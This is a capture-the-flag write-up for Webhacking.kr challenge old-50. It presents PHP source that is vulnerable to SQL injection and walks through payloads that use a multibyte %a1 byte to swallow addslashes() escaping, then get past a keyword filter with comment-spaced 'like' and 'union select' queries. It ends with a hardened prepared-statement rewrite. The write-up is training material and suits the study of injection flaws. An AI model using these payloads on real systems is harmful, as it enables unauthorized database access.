
[Webhacking.kr] old-50

chanchand 2023. 1. 5. 22:50

Challenge


<?php
  include "../../config.php";
  if($_GET['view_source']) view_source();
?><html>
<head>
<title>Challenge 50</title>
</head>
<body>
<h1>SQL INJECTION</h1>
<form method=get>
id : <input name=id value='guest'><br>
pw : <input name=pw value='guest'><br>
<input type=submit>&nbsp;&nbsp;&nbsp;<input type=reset>
</form>
<?php
  if($_GET['id'] && $_GET['pw']){
    $db = dbconnect();
    $_GET['id'] = addslashes($_GET['id']); 
    $_GET['pw'] = addslashes($_GET['pw']);
    $_GET['id'] = mb_convert_encoding($_GET['id'],'utf-8','euc-kr');
    foreach($_GET as $ck) if(preg_match("/from|pw|\(|\)| |%|=|>|</i",$ck)) exit();
    if(preg_match("/union/i",$_GET['id'])) exit();
    $result = mysqli_fetch_array(mysqli_query($db,"select lv from chall50 where id='{$_GET['id']}' and pw=md5('{$_GET['pw']}')"));
    if($result){
      if($result['lv']==1) echo("level : 1<br><br>");
      if($result['lv']==2) echo("level : 2<br><br>");
    } 
    if($result['lv']=="3") solve(50);
    if(!$result) echo("Wrong");
  }
?>
<hr><a href=./?view_source=1>view-source</a>
</body>
</html>


The challenge is solved once a value with lv="3" is found.


Solution


This challenge revolves around the mb_convert_encoding() function.


Related write-up: 2023.01.03 - [wargame/web] - [Webhacking.kr] old-45 (chandlerbong.tistory.com)


select lv from chall50 where id='guest%a1%27%23' and pw=md5('guest')

I tried to check the id=guest row with the query above, but it cannot be confirmed, because %a1 combines with the ' (%27) and produces a character.


- lv=1

select lv from chall50 where id='%a1%27||lv/**/like/**/1%23' and pw=md5('guest')


- lv=3

select lv from chall50 where id='%a1%27||lv/**/like/**/3%23' and pw=md5('guest')

What has to be checked is lv="3", not an lv value of 3.

select lv from chall50 where id='%a1%27/*' and pw=md5('*/union/**/select/**/3%23')
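The weakness is the order of operations: addslashes() runs before the EUC-KR to UTF-8 conversion, so the backslash it inserts can be absorbed into a multibyte character and the quote reappears unescaped. As an added example (not the challenge's own code), here is the same lookup rewritten so that user input never becomes part of the SQL text; the table and column names come from the challenge source, and dbconnect() and the utf8mb4 connection charset are assumptions about the challenge's config.php.

```php
<?php
// Added example: the chall50 lookup rewritten to close the addslashes/mb_convert_encoding gap.
// Assumes dbconnect() (from the challenge's config.php) returns a mysqli connection.

/**
 * Ordering used by the challenge, kept only for comparison: escaping runs
 * before the charset conversion, so a lead byte such as 0xA1 placed in front
 * of the quote can swallow the backslash that addslashes() inserted.
 */
function unsafe_query_string(string $id, string $pw): string {
    $id = addslashes($id);
    $pw = addslashes($pw);
    $id = mb_convert_encoding($id, 'utf-8', 'euc-kr');
    return "select lv from chall50 where id='{$id}' and pw=md5('{$pw}')";
}

/**
 * Hardened lookup: normalise the encoding first, then pass the values as
 * bound parameters. The SQL text never contains user input, so there is no
 * escaping step that a later transformation could undo.
 * Returns the lv column as a string, or null when no row matches.
 */
function lookup_level(mysqli $db, string $id, string $pw): ?string {
    // Tell the driver the connection charset (assumed utf8mb4) so that any
    // escaping it performs is charset-aware; convert BEFORE the value is bound.
    mysqli_set_charset($db, 'utf8mb4');
    $id = mb_convert_encoding($id, 'utf-8', 'euc-kr');

    $stmt = mysqli_prepare($db, "select lv from chall50 where id=? and pw=md5(?)");
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . mysqli_error($db));
    }
    mysqli_stmt_bind_param($stmt, 'ss', $id, $pw);
    mysqli_stmt_execute($stmt);
    mysqli_stmt_bind_result($stmt, $lv);
    $found = mysqli_stmt_fetch($stmt);
    mysqli_stmt_close($stmt);
    return $found ? (string)$lv : null;
}

// Demonstration with the write-up's final payload (constructed input): in the
// unsafe version the quote ends up inside the SQL text; in the hardened version
// the same bytes are only an id value that matches no row.
$id = "\xa1'/*";
$pw = "*/union/**/select/**/3#";
echo unsafe_query_string($id, $pw), "\n";
if (function_exists('dbconnect')) {
    var_dump(lookup_level(dbconnect(), $id, $pw));   // null when no such id exists
}
```

Whether the 0xA1 byte actually consumes the backslash depends on the mbstring version in use; the write-up above shows that it does on the challenge server, and the prepared-statement version does not rely on that behaviour either way.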
